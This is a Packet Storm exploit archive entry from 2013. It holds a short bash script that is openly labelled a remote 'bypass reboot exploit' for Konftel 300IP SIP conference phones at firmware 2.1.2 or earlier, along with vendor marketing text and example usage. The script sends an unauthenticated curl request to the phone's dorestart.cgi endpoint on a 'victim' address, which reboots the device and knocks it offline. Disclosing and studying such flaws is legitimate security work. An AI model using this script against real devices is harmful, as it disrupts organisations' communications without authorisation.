Konftel 300IP 2.1.2 Reboot Bypass

2013-03-27T00:00:00
ID PACKETSTORM:120974
Type packetstorm
Reporter Todor Donev
Modified 2013-03-27T00:00:00

Description

                                        
                                            `#!/bin/bash   
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit  
#  
# by Todor Donev / 03.2013 / Sofia,Bulgaria  
# email: todor dot donev at gmail com  
# type: hardware  
#  
# The Konftel 300IP is a flexible SIP-based conference phone,  
# perfect for companies that use IP voice services. Its clear,   
# natural sound comes from OmniSound HD, Konftel’s patented   
# wideband audio technology. The stylishly designed   
# Konftel 300IP is packed with intelligent features for more  
# efficient conference calls. Record and store meetings on a  
# SD memory card. Use the conference guide to call   
# pre-programmed groups with just a few simple pushes of a  
# button. Conveniently import and export contact details via   
# the Web interface. Create your own phone book with the   
# personal user profile feature. The Konftel 300IP is also   
# ideal for larger conferences since it can accommodate   
# expansion microphones, an external wireless headset and a   
# PA system. With the Konftel 300IP your company will have   
# a conference phone that combines all the benefits of IP   
# voice service with innovative new features.  
#  
# Example usage:  
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180  
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit  
# Rebooting 192.168.1.180..  
# Sleeping 30 secs, before rebooting  
# curl: (7) couldn't connect to host  
#  
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!  
  
if [ $# != 1 ]; then  
echo "usg: $0 <victim>"  
exit;  
fi  
echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"  
echo "Rebooting $1.."  
curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null  
echo "Sleeping 30 secs before rebooting"  
sleep 30  
curl $1  
`